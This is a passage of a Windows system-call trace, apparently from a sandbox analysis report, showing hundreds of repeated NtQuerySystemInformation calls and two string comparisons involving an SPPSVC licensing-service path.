(SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.585] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.591] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x28, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.595] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.596] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2f0, Length=0x50, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1e0, Length=0x50, ResultLength=0x0) [0303.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf40, Length=0x28, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdfb0, Length=0x28, ResultLength=0x0) [0303.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe030, Length=0x28, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf10, Length=0x20, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe110, Length=0x38, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf90, Length=0x20, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.613] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffdf20, Length=0x20, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.614] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe320, Length=0x28, ResultLength=0x0) [0303.628] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0303.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x28, ResultLength=0x0) [0303.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.635] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe320, Length=0x28, ResultLength=0x0) [0303.641] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe3a0, Length=0x50, ResultLength=0x0) [0303.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe100, Length=0x28, ResultLength=0x0) [0303.648] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe170, Length=0x28, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.649] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.651] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.652] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe1f0, Length=0x28, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0d0, Length=0x20, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.653] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe2d0, Length=0x38, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe150, Length=0x20, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0303.654] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa781ffe0e0, Length=0x20, 